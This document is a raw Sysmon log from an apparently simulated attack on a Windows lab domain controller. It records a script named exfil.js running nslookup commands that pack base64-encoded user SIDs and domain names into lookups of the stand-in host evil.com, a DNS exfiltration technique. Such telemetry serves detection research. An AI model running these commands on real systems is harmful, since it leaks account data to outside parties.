VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-4846-000000005F02}7796C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlopcph.tmp 2>&1 10341000x8000000000000000215462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.784{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4946-000000005F02}3364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.784{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4946-000000005F02}3364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.784{2E1864BB-18FE-629A-4946-000000005F02}33647404C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4846-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.768{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4946-000000005F02}3364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.768{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.768{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.768{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.768{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.768{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4846-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.752{2E1864BB-18E0-629A-6742-000000005F02}39764148C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-4846-000000005F02}7796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.768{2E1864BB-18FE-629A-4846-000000005F02}7796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlopcph.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.752{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrtq.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.740{2E1864BB-18FE-629A-4646-000000005F02}77841136C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4746-000000005F02}6208C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.740{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.740{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.740{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.740{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.740{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4746-000000005F02}6208C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.740{2E1864BB-18FE-629A-4546-000000005F02}1722316C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-4746-000000005F02}6208C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.742{2E1864BB-18FE-629A-4746-000000005F02}6208C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-4546-000000005F02}172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrtq.tmp 2>&1 23542300x8000000000000000215442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.721{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D36453303D3D3CAD68B999B38A055E8,SHA256=736BAB12ACF55A344440E809B60190DE15D557E1011E930F6746F0FB65BA3E82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.721{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4646-000000005F02}7784C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.721{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4646-000000005F02}7784C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.705{2E1864BB-18FE-629A-4646-000000005F02}77841136C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4546-000000005F02}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.192{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51293- 354300x8000000000000000215437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.192{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-51293-false127.0.0.1-53domain 354300x8000000000000000215436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.121{00000000-0000-0000-0000-000000000000}1104<unknown process>-udpfalsefalse127.0.0.1-51292-false127.0.0.1-53domain 354300x8000000000000000215435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.121{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51292- 354300x8000000000000000215434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.121{00000000-0000-0000-0000-000000000000}1104<unknown process>-udptruefalse127.0.0.1-51292-false127.0.0.1-53domain 354300x8000000000000000215433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.121{00000000-0000-0000-0000-000000000000}1104<unknown process>-udpfalsefalse127.0.0.1-51291-false127.0.0.1-53domain 354300x8000000000000000215432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.121{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51291- 354300x8000000000000000215431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.121{00000000-0000-0000-0000-000000000000}1104<unknown process>-udptruefalse127.0.0.1-51291-false127.0.0.1-53domain 354300x8000000000000000215430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.121{00000000-0000-0000-0000-000000000000}1104<unknown process>-udpfalsefalse127.0.0.1-51290-false127.0.0.1-53domain 354300x8000000000000000215429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.120{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51290- 354300x8000000000000000215428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.120{00000000-0000-0000-0000-000000000000}1104<unknown process>-udptruefalse127.0.0.1-51290-false127.0.0.1-53domain 354300x8000000000000000215427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.042{00000000-0000-0000-0000-000000000000}7172<unknown process>-udpfalsefalse127.0.0.1-51289-false127.0.0.1-53domain 354300x8000000000000000215426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.042{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51289- 354300x8000000000000000215425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.042{00000000-0000-0000-0000-000000000000}7172<unknown process>-udptruefalse127.0.0.1-51289-false127.0.0.1-53domain 354300x8000000000000000215424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.042{00000000-0000-0000-0000-000000000000}7172<unknown process>-udpfalsefalse127.0.0.1-51288-false127.0.0.1-53domain 354300x8000000000000000215423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.042{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51288- 354300x8000000000000000215422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.042{00000000-0000-0000-0000-000000000000}7172<unknown process>-udptruefalse127.0.0.1-51288-false127.0.0.1-53domain 354300x8000000000000000215421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.041{00000000-0000-0000-0000-000000000000}7172<unknown process>-udpfalsefalse127.0.0.1-51287-false127.0.0.1-53domain 354300x8000000000000000215420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.041{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51287- 354300x8000000000000000215419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.041{00000000-0000-0000-0000-000000000000}7172<unknown process>-udptruefalse127.0.0.1-51287-false127.0.0.1-53domain 10341000x8000000000000000215418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.684{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4646-000000005F02}7784C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.668{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 